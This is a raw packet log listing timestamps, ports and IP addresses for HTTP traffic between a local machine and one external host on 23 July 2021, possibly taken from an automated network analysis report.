Jul 23, 2021 22:24:24.558780909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558790922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558813095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558826923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558835030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558856964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558876991 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558877945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558897018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558918953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558929920 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558942080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558963060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558973074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558985949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559000015 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559006929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559029102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559030056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559055090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559078932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559082985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559101105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559143066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559146881 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559165955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559190989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559211969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559231997 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559235096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559254885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559273958 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559278011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559278965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559300900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559322119 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559340000 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559341908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559362888 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559365034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559386969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559406996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559427977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559439898 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559452057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559456110 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559474945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559497118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559505939 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559518099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559540033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559540033 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.559560061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.559578896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.581387043 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.588697910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.588809967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.588855982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.588893890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.588984966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589018106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589040995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589066029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589090109 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589112997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589140892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589164019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589181900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589205027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589229107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589298010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589324951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589345932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589370012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589396000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589417934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589440107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589464903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589556932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589577913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589581966 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589586020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589589119 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589591980 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589595079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589597940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589600086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589602947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.589900017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.589931011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.590109110 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610488892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610523939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610547066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610569000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610591888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610591888 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610615015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610615969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610636950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610645056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610665083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610687971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610697985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610709906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610732079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610733032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610753059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610774994 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610775948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610796928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610812902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610816002 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610836029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610856056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610856056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610877991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610893965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610899925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610923052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610944986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610955000 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610970974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.610981941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.610996962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.611017942 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.611044884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618510008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618544102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618566990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618573904 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618590117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618612051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618612051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618637085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618663073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618665934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618685007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618705988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618709087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618731976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618751049 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618755102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618777990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618793964 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618798971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618824959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618849039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618850946 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618870974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618885994 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618891954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618913889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618933916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618944883 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.618954897 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618977070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.618979931 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619000912 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619020939 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619024038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619045019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619066000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619074106 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619090080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619126081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619153976 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619157076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619174004 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619180918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619204998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619230986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619235039 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619255066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619272947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619282961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619307041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619330883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619335890 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619352102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619371891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619380951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619393110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619415998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619427919 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619441986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619462013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619471073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619483948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619501114 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619505882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619529009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619545937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619550943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619574070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619599104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619605064 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619621992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619643927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619647980 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619667053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619677067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619690895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619712114 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619725943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619735956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619759083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619785070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619786978 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619810104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619827986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619832039 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619846106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619863987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619868040 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619884014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619904995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619909048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619929075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619955063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619963884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619978905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.619988918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.619999886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620021105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620042086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620062113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620070934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620085001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620100021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620106936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620131016 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620131969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620157003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620178938 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620178938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620215893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620239973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620243073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620260000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620282888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620286942 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620306969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620328903 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620328903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620351076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620372057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620372057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620413065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620434999 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620436907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620455980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620474100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620476007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620496988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.620516062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.620754004 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.641930103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.641988039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642034054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.642038107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642112017 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.642146111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642205954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642254114 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642307043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642354965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642354965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.642401934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.642409086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642461061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642467022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.642498970 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642581940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.642900944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642936945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.642967939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643006086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.643007040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643050909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643054962 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.643094063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643163919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643170118 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.643213987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643249035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643265963 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.643435955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643470049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643492937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.643516064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643551111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643564939 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.643596888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643629074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.643640995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651344061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651381016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651403904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651427031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651442051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651448965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651470900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651483059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651495934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651504040 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651520014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651540995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651556969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651563883 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651578903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651590109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651599884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651623011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651633024 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651643991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651669979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651673079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651695967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651716948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651727915 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651740074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651761055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651762009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651783943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651803970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651804924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651829004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651845932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651854038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651876926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651895046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651917934 CEST	80	49750	45.144.225.135	192.168.2.4
